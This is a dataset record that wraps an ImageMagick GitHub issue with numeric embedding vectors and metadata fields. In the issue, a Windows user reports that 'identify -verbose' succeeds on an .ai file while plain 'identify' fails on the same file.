0.0010062102228403091, -0.0073542362079024315, 0.005571895744651556, -0.017190422862768173, -0.010019417852163315, -0.02716819755733013, 0.001361741335131228, 0.013101034797728062, 0.014500255696475506, 0.007183498237282038, 0.019755661487579346, 0.017873376607894897, 0.01599109172821045, -0.03356463462114334, -0.003433503909036517, -0.007437523454427719, -0.019739003852009773, 0.013367553241550922, -0.018106579780578613, -0.018123237416148186, 0.02428646944463253, -0.012609641999006271, -0.021787861362099648, 0.010927245952188969, -0.016815632581710815, -0.017989978194236755, 0.00020053931802976876, 0.035147085785865784, 0.0006480764714069664, -0.007828972302377224, -0.005905043799430132, 0.0012597148306667805, 0.007974724285304546, -0.01638253964483738, 0.023853378370404243, 0.008016367442905903, 0.023320341482758522, -0.023553544655442238, 0.01220986433327198, 0.010885602794587612, -0.0193891990929842, 0.005780113395303488, 0.0006912815733812749, -0.013092705979943275, 0.012084933929145336, -0.002438225084915757, 0.020538557320833206, -0.011368666775524616, -0.013875603675842285, 0.0016980123473331332, 0.01145195309072733, 0.004051909316331148, 0.0016230541514232755, 0.018722902983427048, 0.03791221231222153, 0.013717358000576496, -0.0013315498363226652, -0.009419752284884453, 0.059300296008586884, -0.020272040739655495, -0.003210711292922497, -0.023287026211619377, 0.017923347651958466, 0.006413093768060207, 0.004455850925296545, -0.01599941961467266, -0.0010827301302924752, 0.021121567115187645, 0.01730702444911003, 0.01631591096520424, -0.005401157774031162, -0.0127595579251647, -0.007504152599722147, -0.016207637265324593, 0.008545239455997944, -0.00783313624560833, -0.004376728553324938, 0.015449726022779942, 0.0041914149187505245, 0.013400867581367493, -0.00039769511204212904, 0.01439198199659586, 0.0034689009189605713, -0.002779701491817832, -0.0032627657055854797, -0.005805099382996559, 0.005380336195230484, 0.010744014754891396, -0.0022945550736039877, -0.008020531386137009, -0.0017823403468355536, 0.01998886466026306, 0.029533546417951584, 0.0020957074593752623, -0.006225698161870241, -0.01592446118593216, 0.016557442024350166, 0.026468588039278984, -0.012359781190752983, -0.02252078801393509, -0.0029920830857008696, 0.01671568863093853, -0.009094933047890663, 0.00882008671760559, -0.0020988306496292353, 0.008120476268231869, 0.011843401938676834, -0.0008614992257207632, -0.005655182991176844, 0.01775677502155304, 0.0016043145442381501, -0.017806746065616608, 0.012709585949778557, -0.006413093768060207, 0.007895600982010365, 0.016890591010451317, 0.015707915648818016, 0.01970568858087063, -0.00864518340677023, 0.0005356391193345189, 0.018622959032654762 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-48 Q16-HDRI x64 c243c92:20220911 ### Operating system Windows ### Operating system, version and so on Windows 10 Pro 22H2 ### Description Identify is throwing an error on a what appears to be a valid `ai` file. ### Steps to Reproduce I've attached a file that is causing `identify` to choke. I'm not sure what the problem is exactly. This works: `Identify -verbose TrashMinis.ai` This doesn't: `Identify TrashMinis.ai` [TrashMinis.zip](https://github.com/ImageMagick/ImageMagick/files/11073548/TrashMinis.zip) Going to upgrade IM and see if that solves it. ### Images _No response_
Identify -verbose [$file] is working, but Identify [$file] is broken.
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6196/comments
2
2023-03-27T00:36:58
2023-03-27T06:23:57Z
https://github.com/ImageMagick/ImageMagick/issues/6196
1,641,170,779
6,196
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Identify -verbose [$file] is working, but Identify [$file] is broken. Issue date: --- start body --- ### ImageMagick version 7.1.0-48 Q16-HDRI x64 c243c92:20220911 ### Operating system Windows ### Operating system, version and so on Windows 10 Pro 22H2 ### Description Identify is throwing an error on a what appears to be a valid `ai` file. ### Steps to Reproduce I've attached a file that is causing `identify` to choke. I'm not sure what the problem is exactly. This works: `Identify -verbose TrashMinis.ai` This doesn't: `Identify TrashMinis.ai` [TrashMinis.zip](https://github.com/ImageMagick/ImageMagick/files/11073548/TrashMinis.zip) Going to upgrade IM and see if that solves it. ### Images _No response_ --- end body ---
829
[ -0.040103014558553696, 0.0223690178245306, -0.004354329314082861, 0.01310617197304964, 0.006977722980082035, 0.025507014244794846, 0.000502907088957727, 0.03587104007601738, 0.011940219439566135, 0.029681412503123283, -0.000793945393525064, -0.03198453038930893, 0.028990477323532104, 0.005905334372073412, -0.008845406584441662, -0.013048593886196613, -0.031408749520778656, 0.023851649835705757, -0.04303948953747749, -0.04652295261621475, 0.017863547429442406, -0.007348380982875824, -0.004098827484995127, 0.020713653415441513, -0.01751807890832424, -0.007262013852596283, -0.00979544222354889, 0.009082915261387825, -0.04721388593316078, -0.02270009182393551, 0.04485319182276726, 0.014624789357185364, 0.0065386914648115635, 0.03762716427445412, 0.09275801479816437, 0.0010597934015095234, 0.007780215237289667, 0.07784533500671387, 0.0032027713023126125, 0.02799725905060768, -0.00960831344127655, -0.05792337656021118, 0.01747489534318447, 0.006153639405965805, -0.02448500692844391, -0.026888884603977203, -0.005315160844475031, 0.01692790538072586, -0.028040442615747452, 0.052050430327653885, 0.008370389230549335, -0.026226738467812538, -0.020526524633169174, -0.046551741659641266, 0.016078632324934006, -0.0032027713023126125, 0.04594717174768448, 0.025003207847476006, -0.012141741812229156, -0.01144360937178135, -0.030545081943273544, 0.030372347682714462, 0.018367353826761246, 0.039930280297994614, 0.008780631236732006, -0.019619673490524292, -0.01093260571360588, 0.018914343789219856, 0.006693432107567787, 0.01356679480522871, -0.007715439889580011, -0.002303116489201784, 0.037080176174640656, 0.02475850097835064, 0.04799119010567665, 0.007434747647494078, 0.013048593886196613, 0.021562928333878517, -0.017374135553836823, 0.005315160844475031, -0.06293265521526337, 0.01573316380381584, -0.03336640074849129, 0.04565928503870964, 0.0057146078906953335, 0.01088942214846611, -0.04050606116652489, -0.0697268471121788, -0.04260765388607979, 0.003161387285217643, -0.0012829077895730734, 0.015229357406497002, 0.027982864528894424, 0.012004994787275791, -0.017921125516295433, -0.019101472571492195, 0.014927073381841183, 0.008737447671592236, -0.03561193868517876, -0.02557898685336113, 0.03184058517217636, -0.034287646412849426, -0.0026755735743790865, -0.018108252435922623, -0.003990869037806988, -0.0085071362555027, -0.042348552495241165, -0.033740654587745667, 0.0228872187435627, 0.11354363709688187, -0.009140493348240852, 0.008917379193007946, -0.03483463451266289, -0.011493990197777748, -0.020325003191828728, 0.017546867951750755, 0.006376753561198711, 0.0011533575598150492, -0.04177277535200119, -0.0013602781109511852, -0.015243751928210258, -0.046321429312229156, 0.006581875029951334, 0.019374966621398926, -0.016078632324934006, 0.051042817533016205, 0.0006401044083759189, -0.016668805852532387, -0.008723053149878979, -0.00327654299326241, -0.016308942809700966, -0.017330951988697052, 0.00006100784594309516, 0.0007417654269374907, -0.04229097440838814, -0.028860928490757942, -0.058959782123565674, 0.027651792392134666, 0.007100075948983431, -0.018741609528660774, -0.0333951897919178, -0.009471566416323185, 0.016323337331414223, 0.020425762981176376, -0.017330951988697052, 0.02881774492561817, -0.02054091915488243, -0.030026881024241447, 0.012004994787275791, -0.005279174540191889, -0.029825357720255852, -0.012955030426383018, 0.028976082801818848, 0.016985483467578888, 0.04378800094127655, -0.0059845042414963245, 0.04658053070306778, -0.011299665085971355, -0.02219628542661667, -0.03673470765352249, 0.023866044357419014, -0.020512130111455917, 0.007614678703248501, -0.006974124349653721, -0.016164997592568398, 0.012998213060200214, -0.0054087252356112, 0.0002399829390924424, 0.001948652439750731, 0.025924453511834145, 0.001405260874889791, 0.016352126374840736, -0.004922911524772644, -0.030573870986700058, -0.02677372843027115, 0.014516830444335938, 0.0010570944286882877, 0.027291929349303246, -0.0004426302039064467, 0.0011758488835766912, 0.005016475450247526, 0.014855100773274899, 0.0013854685239493847, -0.01898631639778614, 0.03984391316771507, -0.01707185059785843, 0.02713358961045742, -0.019115867093205452, 0.005106440745294094, -0.026888884603977203, 0.01143641211092472, -0.013653161935508251, 0.022628119215369225, -0.028155598789453506, 0.04689721018075943, 0.027968470007181168, -0.03270425274968147, -0.029177606105804443, 0.032646674662828445, -0.039699967950582504, 0.02703282982110977, 0.0004430800036061555, -0.020670469850301743, 0.005782981403172016, 0.034345224499702454, 0.020555313676595688, -0.030142037197947502, -0.00776582071557641, 0.010400010272860527, -0.0661570206284523, -0.009068520739674568, -0.03446038067340851, 0.02146216668188572, 0.008226444013416767, 0.004955298732966185, 0.007337585091590881, -0.002252735663205385, 0.01990756206214428, -0.02150535024702549, 0.018223408609628677, 0.019245415925979614, -0.00015485308540519327, 0.007262013852596283, -0.008931773714721203, -0.03376944363117218, -0.04062121734023094, -0.025190336629748344, -0.011134128086268902, -0.03385581076145172, 0.010831844061613083, -0.0027763349935412407, -0.04016059264540672, 0.03028598055243492, 0.031408749520778656, -0.010184093378484249, -0.03849083185195923, -0.010781464166939259, -0.01183226052671671, -0.028846533969044685, -0.0074995229952037334, 0.013782712630927563, 0.03981512412428856, -0.00019185140263289213, -0.017921125516295433, 0.009615510702133179, 0.01459600031375885, 0.012249700725078583, -0.02448500692844391, -0.003368307836353779, 0.01930299401283264, 0.036302872002124786, -0.014164166525006294, 0.01251599844545126, 0.01093260571360588, 0.011947416700422764, -0.0025280301924794912, 0.011803471483290195, 0.0019720434211194515, 0.0004718689597211778, -0.008298416621983051, 0.026788122951984406, 0.041024260222911835, -0.021246248856186867, 0.03198453038930893, 0.022412201389670372, -0.019562095403671265, -0.021217459812760353, -0.033193666487932205, 0.012400842271745205, -0.01907268352806568, 0.031783007085323334, 0.006866165902465582, -0.0023391025606542826, -0.014336899854242802, -0.02831393852829933, -0.01502783503383398, -0.02375088818371296, 0.005138828419148922, 0.010522362776100636, -0.022656908258795738, -0.012400842271745205, 0.014430464245378971, -0.014185757376253605, 0.03918176889419556, -0.00020410919387359172, 0.0009581324411556125, 0.02337663248181343, 0.008435163646936417, -0.05380655825138092, -0.012249700725078583, -0.005545472726225853, 0.02127503789961338, -0.020871993154287338, -0.014336899854242802, -0.008377586491405964, -0.004023256711661816, 0.017330951988697052, 0.024312272667884827, -0.006970525719225407, -0.023189503699541092, 0.0061104558408260345, 0.006182427983731031, 0.001133565092459321, 0.03184058517217636, 0.009370804764330387, 0.03581346198916435, 0.014631986618041992, 0.004005263559520245, -0.02549261972308159, -0.012746309861540794, 0.005729001946747303, 0.02370770461857319, -0.0309769157320261, -0.00013314891839399934, -0.01980680227279663, -0.01629454828798771, 0.019159050658345222, -0.05397929251194, 0.003836128395050764, -0.03748321905732155, -0.00504526449367404, -0.013322088867425919, -0.02488805167376995, 0.03207089751958847, 0.019389361143112183, -0.012372053228318691, -0.013617175631225109, 0.020742442458868027, -0.023434210568666458, 0.0008524229633621871, 0.005469901487231255, -0.021203065291047096, -0.005412323400378227, 0.018971921876072884, 0.04580322653055191, -0.0256221704185009, -0.016265759244561195, 0.006506303790956736, -0.014408872462809086, 0.014077799394726753, -0.03284819796681404, 0.035986192524433136, -0.021433377638459206, -0.05101402848958969, 0.03866356611251831, -0.04272281005978584, 0.009932189248502254, -0.007974540814757347, 0.020828809589147568, 0.009082915261387825, 0.0009100008755922318, 0.019461333751678467, -0.02570853754878044, -0.028673799708485603, -0.02365012653172016, -0.014423266984522343, 0.0019342579180374742, -0.04338495433330536, 0.0335967093706131, 0.0036507993936538696, 0.00965149700641632, -0.055850572884082794, -0.026600994169712067, -0.004847340285778046, 0.0037137751933187246, 0.0003544640203472227, -0.010867830365896225, -0.0033934980165213346, -0.015891503542661667, -0.014056207612156868, -0.02022424153983593, 0.03440280258655548, -0.056858185678720474, 0.019979534670710564, -0.05723244324326515, -0.04525623843073845, 0.0075355092994868755, -0.007715439889580011, 0.00024605559883639216, 0.015718769282102585, -0.02599642612040043, -0.009212465956807137, 0.01751807890832424, -0.02745026908814907, 0.0017840155633166432, -0.004030453972518444, 0.005110039375722408, -0.016352126374840736, 0.011076550930738449, -0.017906730994582176, -0.018468115478754044, 0.00559225445613265, -0.010119318030774593, -0.0667903795838356, 0.015502852387726307, 0.036849863827228546, 0.008571911603212357, -0.03169663995504379, 0.006240006070584059, -0.028155598789453506, -0.008679870516061783, 0.007549903355538845, 0.056714240461587906, -0.005818967707455158, -0.027939680963754654, 0.043816789984703064, -0.019389361143112183, -0.007988935336470604, 0.026759333908557892, 0.023909227922558784, -0.0028231169562786818, 0.02186521142721176, -0.008204852230846882, 0.005372738931328058, -0.0018460918217897415, -0.013869079761207104, -0.008787828497588634, -0.003926093690097332, -0.007578692398965359, -0.012292884290218353, 0.01450243592262268, -0.026255527511239052, -0.021850816905498505, -0.009968175552785397, -0.01738852821290493, 0.003965678624808788, -0.02570853754878044, 0.0066826362162828445, 0.048941224813461304, -0.020325003191828728, -0.021289432421326637, -0.028429092839360237, 0.03293456509709358, 0.032186053693294525, -0.009989767335355282, 0.002869898919016123, -0.04761693254113197, 0.007888173684477806, 0.029710201546549797, -0.006466719321906567, -0.026010820642113686, 0.04917153716087341, -0.00017936868243850768, -0.012911846861243248, -0.04842302203178406, -0.008284022100269794, -0.03742564097046852, -0.00846395269036293, -0.009709075093269348, -0.014826311729848385, 0.004066439811140299, 0.07179965823888779, -0.02022424153983593, -0.048480600118637085, 0.012069769203662872, 0.0010031152050942183, -0.019734829664230347, 0.0040376512333750725, 0.0043075475841760635, -0.013084580190479755, -0.0005469901370815933, 0.01310617197304964, -0.018914343789219856, -0.019835589453577995, -0.016049843281507492, 0.037080176174640656, -0.0074995229952037334, -0.027896497398614883, 0.01281108520925045, 0.02324708178639412, 0.01331489160656929, 0.0028195183258503675, 0.00482574850320816, 0.0187991876155138, 0.01871282048523426, 0.0024668537080287933, -0.029623834416270256, 0.024470612406730652, -0.011976205743849277, -0.0071936403401196, 0.004908517003059387, -0.03509373590350151, -0.0306602381169796, 0.005905334372073412, 0.03872114419937134, -0.008298416621983051, 0.03837567940354347, -0.0377998985350132, -0.01816583052277565, 0.04070758447051048, 0.013732331804931164, 0.03244515135884285, 0.014970256946980953, -0.042262185364961624, -0.006405542604625225, 0.02631310559809208, -0.003528446424752474, -0.013782712630927563, 0.03837567940354347, 0.034114912152290344, 0.012681534513831139, -0.004883326590061188, -0.02127503789961338, -0.01413537748157978, 0.043816789984703064, -0.0157475583255291, -0.00931322667747736, 0.011054959148168564, -0.010011359117925167, -0.015704374760389328, -0.006275992374867201, -0.06333570182323456, 0.02324708178639412, -0.030861759558320045, 0.014164166525006294, 0.0024650543928146362, 0.03725290670990944, -0.02864501066505909, 0.031092071905732155, 0.020929571241140366, -0.01633773185312748, -0.021404588595032692, -0.01409219391644001, 0.02648583985865116, 0.005703811999410391, -0.002380486810579896, 0.018496904522180557, -0.0031829788349568844, 0.015517246909439564, -0.014826311729848385, 0.017446106299757957, -0.023822860792279243, -0.0007354678236879408, 0.037771109491586685, -0.012551984749734402, 0.017489289864897728, -0.01600665971636772, 0.007355578243732452, -0.007107273209840059, -0.0174317117780447, -0.005444711074233055, 0.0010031152050942183, -0.010572743602097034, 0.02041137032210827, -0.0058405594900250435, -0.00860070064663887, -0.007636270485818386, 0.024960024282336235, -0.02013787440955639, -0.0010939802741631866, 0.025003207847476006, 0.008622292429208755, 0.00924125500023365, 0.015560430474579334, 0.016596833243966103, 0.027968470007181168, 0.002205953700467944, 0.012278489768505096, 0.033107299357652664, 0.014826311729848385, -0.020900782197713852, 0.02745026908814907, -0.02457137405872345, 0.03958481550216675, -0.020785626024007797, -0.01055115181952715, 0.036130137741565704, 0.012487209402024746, -0.08181820809841156, -0.027507847175002098, 0.012688731774687767, 0.0028051238041371107, -0.013926656916737556, -0.00218975986354053, 0.008888590149581432, 0.0108174504712224, 0.0025280301924794912, -0.031322382390499115, -0.01875600405037403, -0.00970187783241272, 0.06080227345228195, -0.0011956413509324193, -0.0022959192283451557, 0.03201331943273544, -0.006930941250175238, -0.019231021404266357, -0.001293703680858016, -0.027882102876901627, -0.041110627353191376, -0.02337663248181343, -0.029710201546549797, 0.014430464245378971, 0.013933854177594185, 0.0192166268825531, 0.03607255965471268, -0.015905898064374924, 0.014545619487762451, 0.005210801027715206, 0.01986437849700451, 0.017460500821471214, 0.012890255078673363, -0.0017003476386889815, 0.022210679948329926, 0.012890255078673363, -0.022959191352128983, -0.000012454596799216233, 0.01936057209968567, 0.011357243172824383, 0.00776582071557641, -0.0008528727921657264, -0.015128595754504204, 0.03518010303378105, 0.018453720957040787, -0.00251003704033792, 0.04836544394493103, 0.012372053228318691, -0.014452056027948856, 0.009226860478520393, -0.02768058143556118, -0.017359741032123566, 0.017676418647170067, -0.050265517085790634, -0.0032207644544541836, 0.01013371255248785, 0.012357658706605434, 0.021850816905498505, -0.027263140305876732, -0.013717937283217907, 0.014725551009178162, -0.0038469242863357067, -0.01345163956284523, 0.0011974406661465764, -0.0024506598711013794, -0.03290577605366707, -0.02123185433447361, 0.022815247997641563, 0.023045558482408524, -0.023131925612688065, -0.02077123150229454, -0.02448500692844391, -0.010184093378484249, -0.017906730994582176, -0.005750593729317188, 0.0333951897919178, -0.01024886779487133, 0.010831844061613083, 0.011270876042544842, -0.0006131147965788841, 0.01976361870765686, 0.003211767878383398, -0.031034493818879128, 0.006783397402614355, 0.015214962884783745, 0.01902949996292591, 0.0035464393440634012, 0.010709491558372974, 0.015905898064374924, 0.020512130111455917, 0.0014799322234466672, 0.0050056795589625835, 0.007103674579411745, -0.0005469901370815933, -0.035842251032590866, -0.007441944908350706, 0.030487503856420517, 0.00875903945416212, -0.009176479652523994, -0.03834689036011696, 0.010795858688652515, 0.03935450315475464, 0.015171779319643974, -0.006992117501795292, -0.006743812933564186, 0.005657029803842306, -0.008111287839710712, 0.00021141889737918973, 0.01917344518005848, -0.006139244884252548, -0.016769565641880035, -0.010968592017889023, -0.0058585526421666145, 0.0001395589642925188, -0.008607897907495499, 0.0030462313443422318, -0.0024542585015296936, 0.00015597765741404146, 0.011983403004705906, 0.006329971365630627, -0.00021231854043435305, -0.01976361870765686, 0.01829538121819496, -0.018381748348474503, -0.01720140129327774, -0.007600284181535244, -0.002826715586706996, 0.013206933625042439, -0.005761389620602131, -0.014329702593386173, -0.012508801184594631, -0.036907441914081573, -0.05887341499328613, 0.02041137032210827, 0.030026881024241447, 0.00571820605546236, -0.026025215163826942, 0.009514749981462955, 0.016625622287392616, -0.02054091915488243, -0.007528312038630247, -0.00437951972708106, -0.011515581980347633, -0.009809836745262146, 0.014927073381841183, 0.011645132675766945, 0.0023049158044159412, -0.004951700568199158, 0.00529716769233346, -0.0008348796982318163, 0.001452042954042554, -0.00373536697588861, 0.028357120230793953, -0.0036849863827228546, 0.0009599317563697696, -0.03857719898223877, 0.018065068870782852, 0.026615388691425323, 0.010054542683064938, 0.01374672632664442, 0.0031092071440070868, 0.018684031441807747, -0.03494979068636894, 0.001052596140652895, 0.02511836402118206, 0.0006760906544514, 0.004491077270358801, 0.01728776842355728, 0.05409444868564606, -0.006880560424178839, 0.03258909657597542, -0.008226444013416767, 0.019835589453577995, -0.00978824496269226, -0.010565546341240406, -0.029623834416270256, 0.004545056261122227, -0.01315655279904604, -0.024729711934924126, 0.01271752081811428, -0.0288753230124712, -0.020065901800990105, 0.022959191352128983, 0.00036458513932302594, 0.01665441133081913, -0.026197949424386024, 0.008104090578854084, -0.017374135553836823, 0.015574824996292591, -0.00901813991367817, -0.009032534435391426, -0.002806923119351268, 0.013415653258562088, -0.03638923913240433, -0.01651046611368656, 0.02950868010520935, 0.028400303795933723, -0.0046278247609734535, 0.03518010303378105, -0.005030869971960783, 0.005156821571290493, -0.02950868010520935, -0.006495507899671793, 0.010810253210365772, -0.019015105441212654, -0.020109085366129875, 0.029911724850535393, -0.03244515135884285, -0.01098298653960228, -0.012141741812229156, 0.016913510859012604, 0.0016778563149273396, -0.026370683684945107, 0.028169993311166763, -0.04511229321360588, 0.02791089192032814, 0.015474063344299793, -0.03532404825091362, -0.018914343789219856, -0.03471948206424713, -0.0008249835227616131, 0.021606111899018288, -0.01963406801223755, -0.020843204110860825, 0.06241445615887642, -0.0175324734300375, -0.0260396096855402, -0.006009694654494524, -0.013811501674354076, 0.006589072290807962, 0.01720140129327774, -0.012523195706307888, -0.010536757297813892, -0.0004478032060433179, 0.0018334966152906418, -0.05323077738285065, -0.04401831328868866, -0.005872946698218584, -0.02488805167376995, 0.011040564626455307, -0.015618008561432362, 0.01606423780322075, 0.026744939386844635, -0.00782339833676815, 0.012789493426680565, 0.0070928786881268024, 0.013091777451336384, 0.019691646099090576, -0.010155304335057735, -0.0202674251049757, 0.0011749492259696126, 0.011177311651408672, -0.04396073520183563, 0.018827976658940315, 0.023851649835705757, -0.02534867450594902, -0.036677129566669464, -0.022498568519949913, -0.01724458485841751, -0.0011839458020403981, -0.0025190336164087057, 0.004617028869688511, -0.026514628902077675, -0.0399014912545681, -0.000042030751501442865, -0.0011767485411837697, -0.027435874566435814, -0.004778966773301363, 0.005358344409614801, -0.015128595754504204, -0.029350340366363525, 0.039556026458740234, 0.01162354089319706, -0.0003423186717554927, -0.009557933546602726, -0.014056207612156868, -0.001901870360597968, -0.020871993154287338, -0.020253030583262444, -0.000025766677936189808, -0.019101472571492195, -0.004088031593710184, -0.002767338417470455, 0.009716272354125977, 0.0038289311341941357, 0.024038778617978096, 0.016870327293872833, -0.005304364953190088, -0.00894616823643446, 0.006632255390286446, -0.020612891763448715, -0.015632402151823044, -0.002045815112069249, 0.03673470765352249, -0.014739945530891418, -0.00004205886580166407, 0.03028598055243492, -0.023506181314587593, 0.013077382929623127, 0.024413034319877625, 0.011134128086268902, 0.022225074470043182, -0.03437401354312897, -0.05705970898270607, 0.009054126217961311, 0.005930524785071611, -0.017690813168883324, -0.002364292973652482, 0.016827143728733063, 0.006463120691478252, -0.010054542683064938, -0.009378002025187016, 0.008276824839413166, 0.030861759558320045, 0.012055374681949615, 0.01413537748157978, -0.014617592096328735, -0.03794384375214577, 0.002781732939183712, -0.017273373901844025, 0.0016661607660353184, -0.004411907400935888, -0.0193173885345459, 0.02471531741321087, -0.009176479652523994, -0.007636270485818386, 0.014538422226905823, 0.035669516772031784, 0.01514299027621746, -0.0441046804189682, 0.007233225274831057, -0.037684742361307144, -0.0037425642367452383, -0.01784915290772915, 0.012883057817816734, -0.00024065766774583608, -0.011594751849770546, -0.014128180220723152, 0.009637102484703064, 0.004260765388607979, 0.020526524633169174, -0.006045680493116379, 0.0166975948959589, 0.012048177421092987, 0.015574824996292591, -0.006423535756766796, -0.017273373901844025, -0.006715023890137672, -0.0333951897919178, 0.009917794726788998, -0.015977870672941208, 0.039412081241607666, -0.040333326905965805, 0.007859384641051292, 0.023909227922558784, -0.007211633492261171, 0.022354623302817345, -0.027579819783568382, -0.014768734574317932, -0.0030894146766513586, 0.010068937204778194, 0.016596833243966103, -0.009644299745559692, 0.012300081551074982, 0.007794609759002924, 0.018698425963521004, -0.007585889659821987, -0.008780631236732006, -0.007693848572671413, 0.013386864215135574, 0.007330387830734253, -0.03733927384018898, 0.005383534822613001, 0.012832676991820335, -0.01553164143115282, -0.020900782197713852, -0.0014907281147316098, 0.009521947242319584, -0.0032477539498358965, -0.02146216668188572, 0.0006432532100006938, -0.03019961342215538, -0.016093026846647263, 0.011465201154351234, 0.005095645319670439, -0.009464369155466557, -0.03972875699400902, 0.014567211270332336, -0.009219663217663765, -0.02041137032210827, -0.009989767335355282, 0.006409141235053539, -0.013293299823999405, 0.012494406662881374, -0.025694143027067184, -0.004426301922649145, 0.020900782197713852, 0.023506181314587593, -0.024513795971870422, 0.008730250410735607, -0.009752258658409119, -0.029537469148635864, 0.006952532567083836, 0.0035464393440634012, -0.0441046804189682, 0.013343680649995804, -0.0085575170814991, 0.001964846160262823, 0.021793238818645477, -0.015704374760389328, -0.028803350403904915, 0.00890298467129469, -0.04928669333457947, -0.014524027705192566, 0.052050430327653885, 0.01178187970072031, 0.012429631315171719, -0.013869079761207104, 0.016366520896553993, 0.02721995674073696, -0.04502592608332634, 0.02864501066505909, 0.01646728254854679, 0.0026089991442859173, -0.02356375940144062, -0.021159881725907326, 0.050726138055324554, -0.0001194291835417971, 0.0038937062490731478, 0.000008047693881962914, 0.009370804764330387, 0.018784793093800545, -0.03457553684711456, 0.04214702919125557, 0.022527357563376427, 0.0102920513600111, -0.01707185059785843, 0.037857476621866226, 0.01162354089319706, 0.004764572251588106, -0.003481664229184389, -0.00965869426727295, 0.008406374603509903, -0.012343265116214752, 0.013969840481877327, -0.04361526668071747, -0.019418150186538696, 0.0103424321860075, 0.004109623376280069, -0.017877941951155663, -0.018007490783929825, 0.03751200810074806, -0.017273373901844025, 0.019231021404266357, -0.03555436059832573, -0.03872114419937134, -0.0015600015176460147, -0.006096061319112778, -0.012444025836884975, 0.010198487900197506, 0.02873137779533863, -0.004868932068347931, 0.01600665971636772, -0.0006760906544514, 0.017230190336704254, -0.0007539107464253902, -0.017863547429442406, -0.029249578714370728, 0.006819383706897497, -0.02612597681581974, -0.01600665971636772, 0.01902949996292591, 0.03670591861009598, -0.0024794486816972494, -0.010903816670179367, -0.009752258658409119, 0.0012802088167518377, 0.012991015799343586, 0.019288599491119385, -0.0156467966735363, 0.0023570957127958536, -0.017877941951155663, 0.014279321767389774, -0.000714775756932795, 0.03820294514298439, -0.031149649992585182, -0.031869374215602875, -0.02671615034341812, 0.011407623998820782, -0.018727215006947517, 0.01374672632664442, -0.005156821571290493, -0.020843204110860825, -0.034892212599515915, 0.009025337174534798, 0.0001041350478772074, -0.016208181157708168, 0.0029832555446773767, -0.028429092839360237, 0.004372322466224432, 0.0008150872890837491, 0.0006495508132502437, 0.0220523402094841, 0.012789493426680565, 0.015761952847242355, -0.014718353748321533, 0.019749224185943604, -0.00725121796131134, 0.01707185059785843, -0.01770520769059658, 0.005495091900229454, -0.0009419386624358594, 0.006351563148200512, -0.008924576453864574, 0.013293299823999405, 0.001504222978837788, -0.024326667189598083, 0.03929692506790161, 0.00440471014007926, 0.0005928725586272776, -0.042578864842653275, -0.0018892751540988684, -0.026025215163826942, -0.00008175613766070455, -0.0032855395693331957, -0.013127763755619526, -0.014351294375956059, 0.0019216628279536963, 0.008233641274273396, 0.0732966810464859, 0.026572205126285553, -0.02228265069425106, -0.02635628916323185, -0.024859262630343437, -0.005232392810285091, -0.03782868757843971, -0.002267130184918642, -0.010666307993233204, -0.028846533969044685, 0.0024686530232429504, -0.0008546721073798835, -0.007621875964105129, 0.03687865287065506, 0.02457137405872345, 0.002321109641343355, 0.01251599844545126, -0.008874195627868176, 0.022412201389670372, 0.0016130812000483274, -0.029350340366363525, 0.0016103822272270918, 0.019936351105570793, -0.02398120053112507, -0.005682220216840506, -0.0038505226839333773, 0.0022455386351794004, -0.020713653415441513, -0.015157384797930717, -0.017086245119571686, -0.019015105441212654, 0.015459668822586536, -0.008672673255205154, 0.02539185807108879, 0.01856887713074684, 0.019346177577972412, 0.016222575679421425, 0.006974124349653721, 0.0003382702125236392, -0.009190874174237251, 0.00497689051553607, 0.010803055949509144, 0.005682220216840506, -0.0058225663378834724, -0.000039528586057713255, -0.02686009556055069, 0.034345224499702454, -0.0024830473121255636, 0.004552253521978855, 0.014538422226905823, 0.000012138311831222381, -0.03005567006766796, -0.016121815890073776, -0.00009109005623031408, 0.00402685534209013, -0.008478347212076187, 0.014912678860127926, 0.0005613846587948501, -0.029940513893961906, -0.002684570150449872, -0.01829538121819496, 0.005970109719783068, 0.00008288070239359513, -0.016683200374245644, 0.016913510859012604, -0.0011308661196380854, -0.01829538121819496, 0.012976621277630329, -0.002250936347991228, 0.009500355459749699, -0.005649832542985678, 0.013487625867128372, -0.005588655825704336, -0.005077652167528868, 0.029623834416270256, 0.05176254361867905, 0.0032225637696683407, 0.0004552253521978855, 0.0015788943273946643, -0.04292433336377144, 0.0314951166510582, 0.04013180360198021, -0.0015339115634560585, 0.010738280601799488, 0.001678755972534418, 0.006815785076469183, -0.013458836823701859, -0.0034420795273035765, -0.00549149326980114, -0.018367353826761246, -0.02896168828010559, -0.012703126296401024, 0.0008330803830176592, -0.00687336316332221, -0.011630738154053688, 0.00031870274688117206, -0.007046096958220005, 0.01940375566482544, -0.00007433398423017934, 0.00017127179307863116, -0.014358491636812687, -0.000777751614805311, -0.004552253521978855, -0.0007588588632643223, -0.008240838535130024, -0.0025568190030753613, -0.004480281379073858, 0.030631449073553085, -0.010997381061315536, 0.00444789370521903, -0.03322245553135872, -0.011422018520534039, 0.0029994493816047907, -0.023909227922558784, -0.01029924862086773, 0.016625622287392616, 0.022397806867957115, 0.005908933002501726, -0.011083748191595078, 0.0015456069959327579, -0.01986437849700451, -0.0371665433049202, 0.007816201075911522, 0.009730666875839233, 0.006337168626487255, 0.01068789977580309, -0.02059849724173546, 0.0011155720567330718, 0.028702588751912117, 0.004775368142873049, 0.021246248856186867, 0.004527063108980656, 0.02471531741321087, -0.026802517473697662, -0.0035482386592775583, -0.02580929920077324, -0.032186053693294525, -0.00232830666936934, -0.003112805774435401, 0.009665891528129578, -0.016899116337299347, -0.0070928786881268024, 0.04548655077815056, 0.011933022178709507, 0.027838919311761856, 0.005221596919000149, -0.013487625867128372, -0.02009469084441662, 0.00610685721039772, 0.005567064043134451, 0.009068520739674568, -0.041254572570323944, 0.02763739787042141, 0.04246370866894722, 0.0016292749205604196, -0.008226444013416767, 0.005693016108125448, -0.025247914716601372, -0.0010831844992935658, -0.004840143024921417, 0.015157384797930717, 0.01665441133081913, 0.03440280258655548, -0.008449558168649673, 0.010234473273158073, 0.021059120073914528, 0.028112415224313736, 0.0024668537080287933, -0.009428382851183414, -0.015934687107801437, 0.013228525407612324, 0.029537469148635864, -0.023002374917268753, -0.018597664311528206, 0.031322382390499115, 0.015661191195249557, -0.02727753482758999, 0.011954613961279392, 0.01208416372537613, 0.009975372813642025, 0.014430464245378971, 0.016352126374840736, -0.014041813090443611, 0.005603050347417593, 0.013322088867425919, -0.052367109805345535, 